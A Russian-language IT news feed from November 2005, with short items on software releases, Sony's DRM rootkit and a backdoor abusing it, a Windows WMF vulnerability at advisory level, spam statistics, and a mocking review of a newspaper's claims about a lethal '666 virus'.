Лидер украинской политической партии "Информационная Украина" Андрей Колодюк завил, что Интернет мог бы начать свое развитие с Украины, если бы предложение работавшего в УССР советского ученого-кибернетика Виктора Михайловича Глушкова в 1967 году было поддержано Политбюро КПСС. "Он тогда предложил объединить фабрики и заводы, исследовательские институты и институты власти в одну информационную сеть для обработки экономической информации. Но наши идеологические "друзья" с Запада тогда провели очень серьезную кампанию по убеждению членов Политбюро в том, что "перфокарты не могут управлять Кремлем". Даже была статья с таким заголовком в Financial Times. И предложение было отклонено", - приводит слова Колодюка российское интернет-издание "Вебпланета". "Если говорить об истории Интернета, то он вполне мог бы появиться не в Америке, а в Украине", - говорит лидер "Информационной Украины". "Информационно-коммуникационные технологии могут изменить мир - WWW существует всего 15 лет, а как это изменило жизнь человечества! История 1967 года, сегодняшний юбилей - всё это должно быть воспринято современной Украиной как урок необходимости отвечать на вызовы времени полным изменением стратегии развития нашего молодого государства", - сказал Андрей Колодюк, апеллируя к 15-летию технологии WWW (12 ноября 1990 года работвашая в Европейской организации по ядерным исследованиям (CERN) группа британца Тима Бернерса-Ли (ныне он носит титул сэра) предложила первую спецификацию этой концепции обмена гипертекстовыми документами, которая лежит в основе Сети в ее современном понимании).
Источник

13/11/2005 15:59 Liberty Alliance создает открытый стандарт аутентификации
Проект Liberty Alliance объявил о начале разработки спецификации открытого стандарта аутентификации, который сделает совместимыми продукты разных производителей. Спецификацией будет заниматься экспертная группа Strong Authentication. Результат разработки назовут ID-SAFE. Работа началась спустя несколько месяцев после того, как Совет проверки федеральных финансовых институтов США (FFIEC) опубликовал директивы по онлайновой аутентификации для банков. В онлайновых финансовых операциях рекомендуется использовать не только пароль. Улучшения необходимо внести к концу 2006 года, требуют эксперты совета. Liberty Alliance строит процесс технической разработки ID-SAFE с учетом возможности использования правительственными организациями. Первая версия спецификации выйдет в следующем году.
Источник

13/11/2005 12:56 Google запускает новое мобильное приложение
Представители Google объявили о запуске нового сервиса Google Local для мобильных телефонов. Это приложение позволяет абонентам сотовых сетей определять местоположение различных объектов на карте. Можно также рассмотреть их изображение со спутника и определить направление движения к выбранному объекту на автомобиле. Сервис сейчас доступен только в США для владельцев мобильных телефонов с функциями загрузки Java-приложений. Не поддерживаются устройства Nextel, BlackBerry и Palm. Приложение загружается бесплатно, но клиентам придется оплачивать операторам услуги доступа к данным.
Источник

13/11/2005 11:55 Построение RAID-массива в FreeBSD
На сайте ONLamp, который принадлежит известному издательству O'Reilly опубликована статья Dru Lavigne под названием "Using Software RAID-1 with FreeBSD", который описывает процесс создания и обслуживания RAID-1 массива (зеркало) программными средствами (в отличие от применения аппаратного RAID-контроллера). Построение массива и обслуживания рассматривается с точки зрения пакета GEOM. Статья будет представлять интерес для начинающих системных администраторов.
Cтатья

13/11/2005 11:06 В РФ появилась новая редакция закона об ЭЦП
Министерство информационных технологий и связи РФ подготовило новую редакцию федерального закона "Об электронной подписи" (ЭЦП) и направило его на рассмотрение в заинтересованные министерства и ведомства, сообщает РБК. Закон об ЭЦП направлен на обеспечение правовых условий использования электронной цифровой подписи в электронных документах, при соблюдении которых электронная цифровая подпись в электронном документе признается равнозначной собственноручной подписи в документе на бумажном носителе. В новом проекте закона уточнены функции уполномоченного федерального органа исполнительной власти в области использования ЭЦП. Согласно проекту, участники правовых отношений вправе по своему усмотрению использовать разные виды электронной подписи, а электронное сообщение, подписанное квалифицированной электронной подписью, признается электронным документом, равнозначным документу в письменной форме, подписанному собственноручной подписью. При этом электронная подпись не может быть признана недействительной только на том основании, что она не является собственноручной подписью либо не имеет сертификата электронной подписи. По закону удостоверяющий центр создает сертификаты электронной подписи, подписывая их электронной подписью, основанной на принадлежащем ему сертификате, выдает их, ведет реестр выданных и аннулированных сертификатов. Удостоверяющий центр до начала своей деятельности должен представить уполномоченному федеральному органу концепцию безопасности удостоверяющего центра, включая меры по обнаружению подделки сертификата подписи, а также должен обеспечить соблюдение условий, предусмотренных в концепции безопасности, в течение всего срока его функционирования. При возникновении обстоятельств, делающих невозможным соблюдение этих условий, удостоверяющий центр должен немедленно уведомить об этом уполномоченный федеральный орган.
Источник

13/11/2005 10:16 "Лаборатория Касперского" обновила антивирус для серверов
«Лаборатория Касперского», сообщает о выпуске нового пакета обновлений для антивирусного комплекса «Антивирус Касперского 5.0 для File Servers» — Maintenance Pack 3 (MP3). «Антивирус Касперского для Windows File Servers» предназначен для антивирусной проверки файловых серверов, работающих под управлением серверных операционных систем семейства Windows. Он позволяет осуществлять поиск и нейтрализацию вредоносных кодов в объектах файловых систем, расположенных на сервере. «Антивирус Касперского 5.0 для Windows File Servers» может использоваться для защиты сетей любого масштаба, от небольшого предприятия до крупной, территориально распределенной корпорации. По мнению создателей, данное обновление обеспечивает улучшение функциональных параметров программы за счет ряда технологических и процедурных изменений. MP3 оптимизировал ряд ключевых функций, к которым относится и возможность формирования списка доверенных процессов. Она позволяет исключать из списка защищаемых процессов указанные администратором и снизить нагрузки на вычислительные мощности системы. Также в MP3 реализована совместимость с ОС Microsoft Windows 2003 Server x64.
Источник

12/11/2005 13:35 О том, как "Литератерная газета" людей пугала
Посещая различные сайты в Интернете на dirty.ru натолкнулся на ссылку на статью во вполне уважаемой "Литературной газете" на статью явно бредового содержания под названием "Дьявол XXI века". Ну ладно - Евгений Касперский нам пророчит грядущий апокалипсис, господа из ЛГ пошли ещё дальше. Оказывается, Интернет приводит в мутациям и изменениям в коре головного мозга. А интервью корреспондента с академиком (!!!) Международной академии информатизации, директора НИИ конверсионных и организационных технологий Владимиром Севастьяновым без слёз читать просто невозможно. Цитирую:
– Я слышала, что в Сети существуют и вирусы-убийцы. Это правда?
– Около 8 лет назад появился психофизический вирус «666», реализованный по технологии 25-го кадра. Его связывают примерно с 50 известными смертельными случаями. Число вызванных им патологических нарушений не известно.
Вирусом «666» генерируют на экране компьютера вставки (которые ваше сознание даже не воспринимает!). Комбинации цветовых пятен приводят за несколько секунд к началу резонансных явлений в кровеносной системе головного мозга. Возникают перепады давления от спазма сосудов, разрывы сосудов, кровоизлияния. Итогом становятся тяжёлые формы инсульта и в ряде случаев – летальный исход.
По принципу 25-го кадра в 2000 году в одной из азиатских стран был создан и вирус 25-th. Century. Fox. Он предназначен для подрыва российской экономики в целом. Вирус активизируется исключительно при работе с программами делового характера – текстовыми и графическими редакторами, электронными таблицами, бухгалтерскими программами. Воспринимая на подсознательном уровне одну из 128 фраз, которые вирус «подсовывает» в каждый 25-й кадр изображения, многие начинают нервничать, производительность труда и настроение падают. В одной из разновидностей этого вируса вам внушают фразу: «Кончай работать, выпей пива!»
Теперь понятно, почему многие администраторы и люди, близкие к компьютерам так любят пиво (к таким относит себя и ньюсмейкер)! Почитайте в выходные - получите заряд бодрости на всю неделю.
Cтатья

12/11/2005 13:08 Минсвязи подготовило концепцию закона о спаме
Как сообщает "Вебпланета" Минсвязи готовит закон о спаме, в рамках которого сейчас вырабатывается концепция этого закона. В распоряжении «Вебпланеты» оказалась концепция проекта федерального закона о внесении изменений в ФЗ «О рекламе» и УК РФ в части распространения сообщений электросвязи. Законопроект содержит положения, относящиеся к гражданскому и уголовному праву.
Концепция закона

12/11/2005 12:06 Вышла новая версия инет-пейджера QIP 2005a (7600)
QIP - бесплатный отечественный клиент для передачи мгновенных сообщений, который позволяет подключаться к различным общедоступным серверам. В данный момент разработка QIP еще не завершена и находится в стадии Alpha-версии. Это означает, что программа может работать не стабильно и ее использование рекомендовано только в целях ознакомления. Однако множество возможностей в программе уже реализовано и работают исправно. Более того, у программы уже появились поклонники, которые считают ее достойной заменой, например, для ICQ. В выпущенной версии QIP 2005a (7600) наконец появилась возможность передавать файлы другим пользователям. Были обновлены: пользовательское соглашение, модуль менеджера учетных записей, сетевой модуль, модуль протокола, модуль иконок / аватаров контактов, идентификация клиентов, алгоритм шифрования пароля, модуль работы с сообщениями, защищенными паролем (несовместимо с предыдущими версиями).
Сайт проекта

12/11/2005 11:30 Будущими жертвами хакеров станут обладателей смартфонов
В настоящее время более половины всех хакерских атак носят ярко выраженный корыстный характер и направлены на взлом банковских счетов или получение не доступной иным путем информации. По прогнозам, общее число подобных случаев будет увеличиваться в ближайшее десятилетие. Среди жертв – как домашние пользователи, так и крупные корпорации. Если 10 лет назад первые хакеры рассылали вирусы из чисто хулиганских соображений, то сейчас ситуация резко изменилась. Общий ежегодный ущерб мировой экономике от хакеров, по самым скромным подсчетам, оценивается в $1 млрд. Были случаи, когда отдельным лицам удавалось взламывать банковские счета на сумму около $500 млн. Хакерство в наши дни — не просто далеко зашедшая школьное любопытство, но и возможность эффективного и скорого обогащения. В ЛК наиболее вероятными будущими жертвами хакеров называют обладателей смартфонов, а также жильцов квартир с автоматизированными бытовыми устройствами, подключенными к компьютерной сети (так называемые «умные дома»).
Источник

12/11/2005 10:56 Один из основателей SUSE Linux ушел из Novell
Стало известно об отставке Хаберта Мантела (Hubert Mantel), одного из идейных вдохновителей дистрибутива SUSE Linux и сооснователя компании SUSE Linux AG, купленной почти два года назад корпорацией Novell. В своем открытом письме пользователям он пишет, что больше не может работать в компании, которая поглотила SUSE в январе 2004 года. «С меня довольно. Я решил оставить Suse/Novell, — делится он. — Больше нет той компании, которую я создал 13 лет назад». Представители Novell также подтвердили отставку Мантела, однако от дальнейших комментариев отказались. Несмотря на это, в Novell говорят, что этот шаг никак не повлияет на стратегию компании в области ОС Linux.
Подробности

12/11/2005 10:37 Софт от IBM для мониторинга блогов
Компания IBM выпустила специализированный софт, который занимается мониторингом и анализом блогов, рассылок, новостных лент и других источников, откуда можно почерпнуть сведения об общественном мнении. Новый софт, получивший название Public Image Monitoring Solution является, по словам вице-президента IBM по вопросам технологических стратегий и инноваций Ирвинга Владовски-Бергера, закономерным ответом на изменения, которые постигли Сеть за последние несколько лет. Прежде всего существенно поменялись основные источники сетевого контента. В былые времена большинство сетевых ресурсов создавались специалистами, сейчас же нет ничего проще, чем открыть собственную домашнюю страницу, дневник или блог. Сегодня источником более половины всего информационного потока в Сети являются частные пользователи. В данных обстоятельствах, конечно, возрастает роль разнообразных поисковых механизмов. Не только потому, что объемы информации просто огромны, но и потому, что частные пользователи и крупные компании используют эту информацию при принятии решений о покупке или совершении сделки. Приобрести Public Image Monitoring Solution можно как у IBM так и у Nstein Technologies, а WebSphere Information Integrator OmniFind версии 8.3 будет доступна ближе к концу этого года.
Пресс-релиз

12/11/2005 09:47 Единый госэкзамен под Linux
Специалистам российской организации "Линуксцентр", занимающейся вопросами развития "открытого ПО" в России, удалось запустить предназначенную для ОС Windows программу "1C:Репетитор" в бесплатной ОС Linux. Об этом представители организации объявили на выставке "Образование и карьера - XXI век", которая проходит в эти дни в Санкт-Петербурге. Как поясняют в "Линуксцентре", это значит, что российские школы теперь могут развернуть инфраструктуру, необходимую для сдачи Единого государственного экзамена (ЕГЭ), в "свободной информационной среде" (инструментом для поддержания которой считается ОС Linux) и сократить затраты на приобретение платной Windows. Программа "1C:Репетитор" является необходимым компонентом для организации проведения ЕГЭ в школах. Чтобы запустить ее в Linux, специалистам потребовалась длительная настройка связки системы и эмулятора Wine, позволяющего в Linux запускать Windows-приложения.
Источник

12/11/2005 09:24 Искатели простых чисел снова взломали главный криптоалгоритм
Сотрудники Федерального агентства по информационной безопасности Германии сумели взломать алгоритм шифрования RSA. В этом не было ничего противозаконного. Организация RSA Security выплатит взломщикам 20 тысяч долларов и готова потратить еще большие суммы на благо хакеров. Однако "нестойкость" математического алгоритма может стоить куда больших денег тем, кто пользуется шифрованием в Интернете. RSA Laboratories опубликовала цепочку ключей возрастающей длины и назначила награду за "взлом" каждого следующего числа. Сейчас таких чисел восемь, причем последнее, длиной в 2048 бит (оно записывается 617 десятичными знаками), оценили в 200 тысяч долларов. 200-значное - разложили на множители в мае этого года. Новое достижение принадлежит той же группе исследователей из Бонна. Его можно было бы назвать шагом назад: "ноябрьское число" RSA-576 содержит на 7 знаков меньше. Вычислителям потребовалось 80 2,2-гигагерцовых процессоров Opteron, которые были непрерывно загружены пять месяцев подряд. На сайте rsasecurity.com очередную (и, надо заметить, предсказуемую) победу над ключом оценивают как поражение. Аргументы понятны: чтобы взломать не самый сложный шифр, все еще требуются месяцы работы современного вычислительного кластера. Любопытно другое. 80 процессоров - далеко не последнее слово техники: существуют куда более мощные суперкомпьютеры.
Cтатья

11/11/2005 12:23 Австралийских провайдеров призвали на войну с зомби
Справедливо оценив проблему зомби как серьезную, правительство Австралии поставило в ряды борцов с местными зомби-компьютерами пять ISP страны, сообщает сайт News.com. Как правило, владельцы зараженных машин даже не подозревают, что их компьютеры используются злоумышленниками для рассылки спама или проведения DoS-атак. Теперь Министерство информации и коммуникации Австралии договорилось с пятью ведущими ISP страны о том, что они будут выявлять в своих сетях зараженные машины и помогать пользователям очистить компьютеры от непрошенных «гостей». Специально созданное правительством подразделение по борьбе со спамом будет регулярно предоставлять ISP списки IP-адресов, с которых осуществляются противозаконные действия, в частности, рассылка спама. Таким образом, у провайдеров будет возможность идентифицировать в своих сетях машины, которые действуют, как зомби. ISP обязались информировать владельцев зараженных машин о состоянии их компьютеров и помогать им в решении проблемы. Если же владелец зомби по каким-либо причинам откажется «дезинфицировать» свою машину, провайдер сможет лишать клиента доступа в интернет до тех пор, пока его компьютер не перестанет быть угрозой для других пользователей.
Подробности

11/11/2005 11:30 Беларусь разрабатывает собственную операционную систему на открытых кодах
В Беларуси разрабатывается операционная система, альтернативная системе компании Microsoft, cообщает linux.org.ru. Об этом в интервью БелаПАН сообщил заместитель сопредседателей оргкомитета V Международного конгресса "Электронное содружество. Парк высоких технологий. Безопасные телематические приложения", генеральный директор Национального центра информационных ресурсов и технологий Национальной академии наук Беларуси (НАНБ) Михаил Маханек.
Подробности

11/11/2005 11:13 Microsoft рекомендует заделать дыру в флэш-плеере Macromedia
Корпорация Microsoft опубликовала на своем веб-сайте первый бюллетень безопасности, содержащий информацию об уязвимости в программном продукте стороннего производителя. Речь идет о флэш-плеере Macromedia. Дыра в Macromedia Flash Player была обнаружена специалистами компании eEye Digital Security. Брешь теоретически позволяет получить несанкционированный доступ к удаленному компьютеру и выполнить на нем произвольный вредоносный код. Для реализации нападения необходимо вынудить жертву открыть сформированный специальным образом файл в формате SWF. Уязвимость присутствует в версиях Flash Player с индексом 7.0.19.0 и более ранних модификациях программы. В бюллетене Microsoft отмечается, что флэш-плеер Macromedia распространяется вместе с операционными системами Windows XP (с первым и вторым сервис-паками), Windows 98, Windows 98 SE и Windows Millennium Edition. Именно этим и объясняется публикация информации о дыре в продукте стороннего производителя на сайте Microsoft.
Подробности

11/11/2005 10:49 В продаже подержанное ПО Microsoft
Microsoft удивила сообщество британских реселлеров, разрешив торговцам по сниженным ценам продавать б/у оптовые лицензии, открывая тем самым шлюзы для рынка ПО секондхенд. На этой неделе Disclic с благословения Microsoft начал предлагать лицензии б/у на программное обеспечение, полученные от обанкротившихся или сокращающихся компаний. «Да, мы это делаем, — сказал директор Disclic Джонатан Хоурли. — Это планировалось полтора года. Раньше многие компании не считали лицензии на ПО активами, а это поможет изменить отношение к ним». Особенности британских законов о банкротстве и пункт, присутствующий во многих лицензиях Microsoft, который допускает передачу неиспользуемых или лишних оптовых лицензий, позволяет Disclic легально торговать такими лицензиями. Они предлагаются со скидкой от 20% до 50% по отношению к ценам у любого другого авторизованного реселлера Microsoft. В четверг представитель Microsoft подтвердил, что Disclic перепродает лицензии «в соответствии с условиями и постановлениями Microsoft». Крис Лам, менеджер по лицензированию ПО фирмы Basilica, которая продает программные продукты крупным предприятиям, был очень удивлен, что софтверный гигант одобрил такую практику. «Это определенно угроза для нас, так как мы ориентируемся на предоставление своим заказчикам полного спектра услуг. Я не знаю, какие цены предлагают эти парни, но если можно будет приобрести точно такие же лицензии за треть цены, последствия будут катастрофическими», — сказал он.
Источник

11/11/2005 09:46 В Курчатовском институте отметили 15-летие советского Интернета
В четверг в Москве в Российском научном центре (РНЦ) "Курчатовский институт" прошла юбилейная научно-практическая конференция "Интернет и наука: 15 лет пути", приуроченная к 15-летней годовщине регистрации закрепленного за СССР доменного имени верхнего уровня .su. Интернет начал свое развитие в России именно с Курчатовского института, где в 1990 году профессиональная научная сеть, объединявшая ученых-физиков и программистов, соединилась с мировым Интернетом, положив начало современным российским сетям. Как поясняют организаторы мероприятия, цель конференции - "осмысление уроков истории развития Интернета в контексте науки и образования, анализ перспектив научно-образовательных сетей и их возможного вклада в развитие информационных технологий и высокотехнологичного производства в России". В числе организаторов, помимо РНЦ, - РосНИИРОС, ГНИИ ИТТ "Информика", "Фонд развития Интернет", РОЦИТ.
Подробности

10/11/2005 13:14 Опубликованы детали уязвимостей в Windows
Как и следовало ожидать, сразу после выхода обновления от Microsoft, появились подоробности уязвимостей, обнаруженных в механизме обработки графических файлов. Как мы писали ранее, уязвимость обнаружена специалистами американской компанией eEye Digital Security (хотя, возможно, и куплены - для специалистов не секрет, что иногда описания и детали уязвимостей покупаются у одиночек, которые эти уязвимости обнаружили). Итак, как мы писали ранее уязвимость связана с алгоритмом обработки GDI (Graphical Device Interface) графических файлов формата WMF и EMF (соответственно, 16-битный и 32-битный формат кодирования графического изображения). Как пишут специалисты, уязвимость присутствует в библиотеке GDI32.DLL и была обнаружена путём дизассемблирования блока MRBP16::bCheckRecord. В результате была обнаружена возможность выполнения целочисленного переполнения кучи путём формирования специального графического файла. Также сооббщается о наличии второй уязвимости в функции PlayMetaFileRecord, которая переключает типы записей "SetPaletteEntries". Если длина подобных записей принимает значения 7FFFFFFFh или FFFFFFFFh, возникает также ситуация целочисленного переполнения буфера в куче с последующей перезаписью кучи двоичными данными из метафайла. Разумеется, устраняется уязвимость обновлением ОС с сайта Microsoft.
Первая уязвимость
Вторая уязвимость

10/11/2005 12:31 США, Южная Корея и Китай по-прежнему генерируют более половины всего спама
Компания Sophos опубликовала очередную "грязную дюжину" государств, являющихся основными поставщиками спама в мировом интернете. В число двенадцати государств, наиболее отличившихся в апреле-сентябре 2005 года, вошли:
1. Соединенные Штаты Америки - 26,35% (41,5% в апреле-сентябре 2004 года)
2. Южная Корея - 19,73% (11,63%)
3. Китай и Гонконг - 15,7% (8,9%)
4. Франция - 3,46% (1,27%)
5. Бразилия - 2,67% (3,91%)
6. Канада 2,53% (7,06%)
7. Тайвань 2,22% (0,86%)
8. Испания 2,21% (1,04%)
9. Япония 2,02% (2,66%)
10. Великобритания - 1,55% (1,07%)
11. Пакистан - 1,42% (новичок списка, вытеснивший из него Украину)
12. Германия - 1,26% (1,02%)
Другие страны - 18,88% (18,1%).
Несмотря на то, что США, Южная Корея и Китай по-прежнему генерируют более половины всего потока спама, фиксируемого почтовыми ловушками Sophos, заметно, что Соединенным Штатам удалось существенно поправить свое положение, сократив свой удельный вес в этом грязном потоке на 15 процентных пунктов. Хорошо проявила себя и Канада, вес которой снизился почти втрое. Возможно, что эта тенденция связана с тем, что принятое за последние два-три года чрезвычайно суровое законодательство по борьбе со спамом, благодаря которому за решетку отправилось уже несколько крупнейших спаммеров континента, все-таки начало приносить свои плоды.
Источник

10/11/2005 12:19 Антивирусники взялись за Sony
История с закладками в защитном софте от Sony продолжает набирать обороты, сообщает bugtraq.ru. Symantec и Computer Associates выпустили на этой неделе обновления для своих антивирусов, позволяющие идентифицировать присутствие этой защиты. Причем если Symanteс просто об этом сообщает и направляет пользователя на сайт Sony с патчем и инструкциями по удалению (упирая в своем обосновании на то, что в данном случае речь идет не о вредоносной программе, а о технологии, которая может быть неверно использована), то Computer Associates считает этот софт слишком опасным и дает возможность его немедленно удалить.
Подробности

10/11/2005 12:06 Обнаружен первый backdoor, использующий rootkit от Sony
Вчера "Лаборатория Касперского" обнаружила первый backdoor, который пытается использовать ставший широкоизвестным rootkit от Sony. После проведенного нами анализа, вредоносная программа получила название Backdoor.Win32.Breplibot.b. Согласно информации, полученной благодаря Trend Micro, данный backdoor был разослан по спам-рассылке. Breplibot.b представляет собой файл размером 10240 байт. Файл упакован UPX. При запуске бэкдор копирует себя в системный каталог Windows под именем $SYS$DRV.EXE. Это имя позволяет вредоносной программе быть скрытой посредством пресловутого руткита от Sony. Разумеется, сокрытие программы произойдет, только если на компьютере функционирует DRM-защита, поставляющаяся на некоторых Audio CD Sony. После запуска бэкдор создает специальный ключ в реестре.
Подробнее

10/11/2005 11:53 Российский патч к OpenSSL
ООО "Криптоком" сообщает о разработке собственной версии патча к OpenSSL, позволяющего добавить российские криптоалгоритмы для этой Open source библиотеке (речь идёт об алгоритмах ЭЦП - ГОСТ-1994, ГОСТ-2001, не являющихся RSA или DSA). Российские требования по сертификации криптографического программного обеспечения делают законным использование решений, в которых сертифицирован только модуль, непосредственно реализующий национальные криптоалгоритмы.
Подробнее о патче

10/11/2005 11:19 В Check Point Integrity появилось антишпионское ПО
Компания Check Point, производитель программного обеспечения для интернет-безопасности, объявила о выпуске Integrity Anti-Spyware, средства защиты от шпионских программ, интегрированного в решение для защиты рабочих мест Check Point Integrity. Integrity Anti-Spyware обнаруживает шпионские программы и автоматически изолирует или удаляет их. Благодаря интеграции, заказчики получают решение для защиты удаленных рабочих мест — включая полностью интегрированное антишпионское ПО — в составе единого клиентского пакета. Объединение антишпионской защиты с защитой рабочих мест упростило управление безопасностью ПК, позволив унифицировать все функции обеспечения безопасности рабочих мест в составе одного клиентского пакета и централизованно управлять ими с одного и того же сервера.
Источник

10/11/2005 11:07 Среда разработки от создателей Java
Зарегистрированным пользователям портала Sun Developer Network компания Sun Microsystems предоставила возможность бесплатно получить среду разработки Sun Java Studio Enterprise 8 с системой визуального создания моделей на языке UML. Среда позволяет переносить интерфейсы и диаграммы классов в центр моделирования методом буксировки. UML-инструменты обеспечивают возможность разработки Java-кода без использования маркеров - в Sun убеждены, что это дает ее продукту преимущество перед аналогичными инструментариями Borland и IBM. В Java Studio Enterprise 8 также предусмотрена возможность вывода диаграмм, отражающих последовательность событий, происходящих в ходе исполнения логики приложения. В новой версии системы также реализована поддержка создания мобильных клиентских приложений для сотовых телефонов и КПК. В состав продукта включен комплект Java Application Verification Kit, позволяющий проверить приложение на соответствие стандартам Java и обеспечить его переносимость на любой стандартный сервер Java-приложений. В системе также предусмотрен механизм профилирования приложений с интегрированным модулем тестирования под рабочей нагрузкой.
Источник

10/11/2005 10:42 Firefox отметил свою первую годовщину в Сети
В среду популярному веб-браузеру с открытым исходным кодом Firefox исполнился год. Как утверждает Mozilla Foundation, с момента дебюта Firefox 1.0 в ноябре прошлого года пользователи загрузили 106,4 млн копий браузера. А по данным NetApplications, полученным в октябре, Firefox завоевал за этот год 8,65% рынка, пробив брешь в доминировании Internet Explorer. «В момент выпуска за первые сутки мы зафиксировали миллион загрузок, и никаких признаков ослабления спроса заметно не было», — рассказывает директор по маркетингу и менеджменту продуктов Mozilla Крис Бирд. По его словам, за прошедший год Firefox помог утвердиться концепции браузера open source, и его популярность росла благодаря народному маркетингу. А на рубеже своего второго года Firefox готовит несколько изменений. В начале ноября вышла тестовая версия Firefox 1.5 Release Candidate 1, отличающаяся такими элементами, как автоматическое обновление и повышенное быстродействие при нажатии на кнопки «вперед» и «назад». Окончательная версия Firefox 1.5 может быть готова уже в ближайшие недели — все зависит от замечаний примерно 500 тыс. пользователей, тестирующий браузер. Следующий год у Firefox тоже будет насыщенным. «В 2006 году мы планируем перейти на более агрессивный цикл разработки продукта, — говорит Бирд. — В середине года выйдет Firefox 2, а в первом квартале 2007 года мы выпустим Firefox 3». Отчасти активизация разработки происходит под влиянием наблюдаемого ускорения освоения Firefox веб-службами.
Подробнее

9/11/2005 14:07 Ленточная новинка Sun
Sun Microsystems выпустила новое ленточное устройство чтения/записи уровня предприятия - T10000, которое обеспечивает передачу данных со скоростью 120 Мбит/с, возможность хранения до 500 Гбайт несжатых или 1 Тбайт сжатых данных на одной кассете, а также передачу данных при помощи двухпортового соединения Fibre Channel и FICON. Таким образом, в Т10000 достигнуто увеличение плотности на 250% и увеличение скорости передачи данных на 400% по сравнению с предыдущим T9940B производства компании StorageTek. Кроме того, как утверждают в Sun, T10000 представляет собой единственное ленточное устройство чтения/записи с функцией шифрования на уровне устройства, обеспечивающей защиту информации от несанкционированного доступа в момент получения данных.
Источник

9/11/2005 13:32 Мошенники прикрываются именем Google
Неизвестная группа мошенников рассылает пользователям Сети письма с обещанием выдать получателю 400 долларов в обмен на данные о его кредитной карте. Все это делается от имени Google. Письма содержат в себе гиперссылку на сайт-ловушку, маскирующийся под Google. Зайдя на такой сайт, потенциальная жертва видит текст "You WON $400.00 !!!" ("Вы выиграли 400 долларов") и предложение перейти на следующую страницу с тем, чтобы ввести там свои личные данные. Как то: почтовый адрес и информацию о состоянии кредитной карты. Понятно, что посетитель, польстившийся на легкие деньги, рискует вообще остаться без штанов. Компания Websense Security Labs, автоматическая сканирующая система которой обнаружила сайт-ловушку, рекомендует пользователям интернета не поддаваться на провокацию и вообще быть предельно осторожными с любыми подозрительными ресурсами, интересующимися содержимым вашего кошелька, сообщает CNET.
Источник

9/11/2005 13:00 Google платит $1 за каждую инсталляцию Firefox
Компания Google обновила условия своего партнерского сервиса AdSense и ввела новую функцию рефералов, то есть индивидуальных партнерских ссылок. С помощью рефералов участники программы AdSense могут получать немалые деньги: по $100 за каждого веб-издателя, заработавшего $100 с помощью системы AdSense, а также до $1 за пользователей, загрузивших браузер Firefox вместе с панелью инструментов Google Toolbar. На каждой странице своего сайта вы можете поместить по одной кнопке реферала для каждого продукта. Программа рефералов за инсталляции Firefox доступна пока только для американских web-издателей. Компания Google обещает вскоре расширить ее на другие страны.
Источник

9/11/2005 11:58 Sophos: в интернете появился новый троян
«Диалог-Наука», официальный партнер компании Sophos в России, сообщает, что эксперты SophosLabs, сети центров анализа вирусов и спама, входящих в компанию Sophos, обнаружили в интернете много экземпляров новой троянской программы, рассылаемой через почтовые сообщения. Троянская программа Troj/BagleDl-W рассылается спамерами по почтовым адресам по всему миру. Тело таких электронных сообщений содержит текст Info или Texte, а присоединенные файлы имеют такие имена, как Health_and_knowledge.zip, text_sms.zip, max.zip, Business.zip и The_new_price.zip. Если запустить программу, которая содержится в этих zip-архивах, то троян пытается установить соединение с рядом веб-сайтов, чтобы скачать на компьютер очередную порцию вредоносного кода. Несмотря на широкое распространение вредоносной программы, Sophos получил лишь несколько сообщений о фактах реального обнаружения этого трояна. Тем не менее, компания Sophos рекомендует пользователям убедиться в том, что их антивирусное программное обеспечение имеет самые последние обновления.
Источник

9/11/2005 11:36 Microsoft создала "защитника" Windows
Компания Microsoft в очередной раз решила заняться безопасностью своих операционных систем. На этот раз софтверный гигант начал активную борьбу со скрытыми модулями, используемыми для получения прав администратора. Компания Microsoft переименовала продукт Windows AntiSpyware, предназначенный для защиты компьютера от шпионских программ. Теперь ПО называется Windows Defender, при этом переработан его графический дизайн и добавлены возможности обнаружения скрытых модулей для получения прав администратора (rootkit), клавиатурных шпионов и других опасных программ. Обновленный инструмент войдет в состав новой операционной системы Windows Vista, выход которой ожидается к концу следующего года. Также выйдет версия Windows Defender для пользователей XP. Это произойдет в виде обновления текущей версии AntiSpyware, которая с января существует в бета-версии. Программа предназначена для защиты компьютера от шпионского ПО, то есть программного обеспечения, устанавливающегося в систему с целью слежения за действиями ничего не подозревающего пользователя. Включение в состав функций программы средства защиты от руткитов означает, что Windows Defender сможет находить и уничтожать хакерские программы, предназначенные для незаметного проникновения сквозь барьеры защитного ПО. С помощью этих модулей хакеры получают контроль над компьютером после успешной первоначальной атаки.
Более подробно

9/11/2005 11:13 Palm: «Мы не отказываемся от Palm OS»
Во вторник глава компании подтвердил ее намерение поддерживать одноименную операционную систему, несмотря на подготовку к выпуску своего первого устройства Treo на базе Windows. «Я обращаюсь к вам потому, что меня беспокоят некоторые комментарии, высказывающие предположение, будто поддержка Palm OS компанией Palm висит на волоске. Ничего подобного!» — пишет генеральный директор Palm Эд Коллиган в обращении к разработчикам ПО для Palm. В сентябре Palm объявила, что вскоре она начнет продавать устройства Treo на платформе Windows, отказавшись от традиционного исключительного использования Palm OS. Тогда же Palm пообещала продолжать разработку новых КПК и телефонов с использованием Palm OS, но сомнения сохранились, особенно ввиду того, что разработчика Palm OS компанию PalmSource хочет приобрести японская Access. Недавно Palm подписала также соглашение, которое позволит телефонам Treo подсоединяться к серверам BlackBerry компании Research In Motion. В письме Коллигана говорится, что он уверен, что его правильно поняли, но все же хочет повторить свои предыдущие заявления: «Это не игра с нулевой суммой. Этот рынок находится в зачаточном состоянии, и если нам предоставляется возможность стать мощным поставщиком кросс-платформенных телефонов мирового класса, то мы должны ею воспользоваться».
Подробности

9/11/2005 11:01 EMI: мы не используем "руткиты"
Одна из крупнейших звукозаписывающих компаний EMI не смогла пройти мимо скандала вокруг системы цифрового управления правами (DRM), которой оборудует свои диски Sony BMG. Лейбл заявил, что, в отличие от конкурента, не использует руткитов в своей продукции. Споры на эту тему разгорелись когда покупатели дисков Sony с защитой от копирования обнаружили непрошенного "гостя" на своем компьютере. За использование встроенного в защищенный диск софта DRM, который продолжает работать даже когда диск не воспроизводится, Sony подверглась резкой критике. Обнаружившаяся неприятность, которую приносили с собой диски Sony, подготовила почву для слухов, что и другие звукозаписывающие гиганты, в частности EMI и Universal Music используют схожую технологию. Однако, как заявил представитель EMI, система DRM может быть полностью удалена с дисков EMI, если пользователь больше не собирается воспроизводить этот диск. "Программу для защиты контента, используемую в наших CD можно легко удалить при помощи стандартного деинсталлятора". EMI не использует софт, заметающий следы программы. Он не включает никакого руткита и не активизирует никаких скрытых процессов", - подчеркнул представитель EMI.
Подробности

9/11/2005 10:36 Билл Гейтс приказал подчиненным бросить все силы на Интернет
